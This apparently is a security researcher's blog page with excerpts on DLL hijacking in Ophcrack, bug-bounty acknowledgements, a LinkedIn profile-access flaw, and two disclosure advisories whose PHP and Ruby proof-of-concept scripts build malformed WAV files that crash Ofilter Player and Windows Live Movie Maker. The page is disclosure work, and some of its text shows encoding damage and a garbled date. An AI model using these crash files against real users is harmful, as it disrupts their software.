Author: Osanda Malith Jayathissa

Ophcrack Path Subversion Arbitrary DLL Injection Code Execution

What is DLL Hijacking?

This is how Microsoft describes it

When an application dynamically loads a dynamic-link library without specifying a fully qualified path name, Windows attempts to locate the DLL by searching a well-defined set of directories in a particular order, as described inĀ Dynamic-Link Library Search Order. If an attacker gains control of one of the directories on the DLL search path, it can place a malicious copy of the DLL in that directory. This is sometimes called aĀ DLL preloading attackĀ or aĀ binary planting attack. If the system does not find a legitimate copy of the DLL before it searches the compromised directory, it loads the malicious DLL. If the application is running with administrator privileges, the attacker may succeed in local privilege elevation.

Basically when an application tries to load a DLL without specifying a fully qualified path name Windows tries to load the DLL in a order of directories. If the application attempts to load a DLL by it’s name it should go in this order of directories (x86).

  1. The directory from which the application loaded.
  2. The system directory.
  3. The 16-bit system directory.
  4. The Windows directory.
  5. The current directory.
  6. The directories that are listed in the PATH environment variable.

Overview of Ophcrack 3.6 (more…)

For the Second Time Acknowledged by Oracle

Last time for reporting a double query SQL injection I got acknowledged. This time for reporting a XSS issue bypassing filters I got acknowledged šŸ™‚

Screenshot_4

http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1932653.xml

Also mentioned in On-Line Presence Security Contributors in this document:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html
Happy to disclose responsibly šŸ˜‰

How I Defeated LinkedIn’s 3rd-degree Profile Security

This issue is already patched by LinkedIn House Security and disclosed after a responsible disclosure.

It was an early morning and I was in the middle of a submission of an assignmentĀ at my college. I got an email from LinkedIn displaying the people who viewed my profile. This made me log into LinkedIn for a while to have a look whatā€™s new. I saw a random profile who was a 3rd-degree relation. I really wanted to view the profile for some reason.Ā  At the very same time I was viewing Olivia Mareeā€™s LinkedIn profile. Well, she is a manager at Bugcrowd and a good friend of mine. I always keep an eye on the URLs šŸ˜‰ so after viewing both profiles and analyzing the web application carefully that morning I got some tricky ideas in my head. I will explain from the beginning so that you can understand the process well. Letā€™s start fuzzing šŸ™‚

1

GET /profile/view?id=31594124&authType=name&authToken=HM8p&trk=prof-sb-browse_map-name HTTP/1.1

As she is already connected in my profile so after having a look at the GET request the ā€œauthTypeā€ parameter has a value of ā€œnameā€ and the token parameter is ā€œauthTokenā€, it has a value of ā€œHM8pā€. This is her profile.

(more…)

Random Bugs

This post is about my random vulnerabilities which I discovered some time ago on some sites in which I did not at least get a “Thanks” message.

HelloĀ ????? šŸ™‚

Screenshot4

 

??????????flash xss

XSS_pub

 

Anyway bug hunting is not all about getting thanks, at least I can be happy that they patched them secretly without notifying me. Ā Good.

 

Acknowledged by StatusPage.io

For reporting a vulnerability regarding cookies my name got published.

hif

https://www.statuspage.io/security

Update

I also received a nice t-shirt from them šŸ™‚

png

 

Thank you very much guys šŸ™‚

Ofilter Player WAV File Handling Division-by-zero DoS Weakness

1. Advisory Information

Title:Ā Ofilter Player WAV File Handling Division-by-zero DoS Weakness
Advisory URL:Ā https://osandamalith.com/2014/01/10/ofilter-player-wav-file-handling-division-by-zero-dos-weakness/
Date published: 2014-01-10
Vendors contacted: 008soft
Release mode: User release

2. Vulnerability Information

Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A

3. Summary

Easy Karaoke Player is a software that is playing karaoke, recording karaoke songs to wav format files. This application is able to read all types of multimedia files with an integrated multimedia player that is both efficient and full-powered.

4. Vulnerability Description

Ofilter Player contains a flaw that may allow for a denial of service. The issue is triggered when a user opens a malformed WAV file, resulting in a division-by-zero error and a loss of availability for the program. This can be exploited remotely by tricking a user into opening the crafted file (e.g., via email), or locally by placing it in a location that may seem safe (e.g., a network share).

5. Vulnerable Packages

  • 1.1

6. Credits

This bug was researched by Osanda Malith Jayathissa.

7. Proof of Concept / Technical Details

[code language=”php”]

<?php
/*
*Title: Ofilter Player 1.1 (.wav) Integer Division by Zero
*Version: 1.1
*Tested on: Windows XP SP2 en
*Vendor: http://www.008soft.com/
*Software Link: http://www.008soft.com/downloads_OfilterPlayer.exe
*E-Mail: OsandaJayathissa@gmail.com
*Bug Discovered by: Osanda Malith
*Twitter: @OsandaMalith
* /!\ Author is not responsible for any damage you cause
* This POC is for educational purposes only
*/
$poc=
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

file_put_contents("ofilterplayer.wav", $poc);
print <<< str
[+] Ofilter Player 1.1 Integer Division by Zero
[+] by Osanda Malith (@OsandaMalith)
[~] File Created "ofilterplayer.wav"
str;
?>

[/code]

8. Report Timeline

2013-09-19: The researcher notifies the vendor 008soft.
2013-09-23:Ā The researcher attempts to contact the vendor
2013-10-05:Ā The researcher attempts to contact the vendor
2014-01-10: Advisory and public disclosure

9. Ā DisclaimerĀ 

The information contained within this advisory is supplied ā€œas-isā€Ā with no warranties or guarantees of fitness of use or otherwise.Ā I accept no responsibility for any damage caused by the use or misuseĀ of this information.

10. References

[1]Ā http://packetstormsecurity.com/files/124610/Ofilter-Player-1.1-Integer-Division-By-Zero.html
[2] http://www.exploit-db.com/exploits/30550

Microsoft Windows Live Movie Maker WAV File Handling DoS Weakness

1. Advisory Information

Title:Ā Microsoft Windows Live Movie Maker WAV File Handling DoS Weakness
Advisory URL:Ā https://osandamalith.com/2014/01/10/microsoft-windows-live-movie-maker-wav-file-handling-dos-weakness/
Date published: 2014-10-10
Vendors contacted: Microsoft
Release mode: User release

2. Vulnerability Information

Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: 2013-4858

3. Summary

Microsoft Windows Live Movie maker is a inbuilt application in Windows 7 systems. It is used in simple scale video editing purposes.

4. Vulnerability Description

Microsoft Windows Live Movie Maker contains a flaw that may allow for a denial of service. The issue is triggered when a user opens a malformed WAV file, resulting in a loss of availability for the program. This can be exploited remotely by tricking a user into opening the crafted file (e.g., via email), or locally by placing it in a location that may seem safe (e.g., a network share).

5. Vulnerable Packages

  • Version 2011 (Build 15.4.53508.1109)

6. Credits

This bug was researched by Osanda Malith Jayathissa.

7. Proof of Concept

[code language=”ruby”]
#!/usr/bin/env ruby
#Title: Windows Live Movie Maker 2011 (.wav) DoS Local Exploit
#Version: Version 2011 (Build 15.4.53508.1109)
#Tested on: Windows 7 Professional 32-bit SP1
#E-Mail: OsandaJayathissa@gmail.com
#Exploit-Author: Osanda Malith Jayathissa
#Video: https://www.youtube.com/watch?v=SBJYzSNdY6k
# /!\ Auhor is not responsible for any damage you cause
# Use this material for educational purposes only
#This is just a simple crash not an exploitable bug
#Twitter: @OsandaMalith
#Date: 25 Decemeber 2013
#CVE: 2013-4858
begin
dos =(
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

file = open("WindowsMovieMaker.wav","w")
file.write(dos)
file.close()

puts "[+] Exploit created >> WindowsMovieMaker.wav"
puts "[*] Open any image and Click add music and add our payload"
puts "[~] by Osanda Malith"
end
#EOF
[/code]


8. Report Timeline

2013-10-16: The researcher notifies the vendor Microsoft.
2013-20-16: Confirms that is only a crash and not a exploitable bug.
2014-01-10: Public disclosure.

9. Ā DisclaimerĀ 

The information contained within this advisory is supplied ā€œas-isā€Ā with no warranties or guarantees of fitness of use or otherwise.Ā I accept no responsibility for any damage caused by the use or misuseĀ of this information.

10. References

[1]Ā http://packetstormsecurity.com/files/124596/Windows-Live-Movie-Maker-2011-Denial-Of-Service.html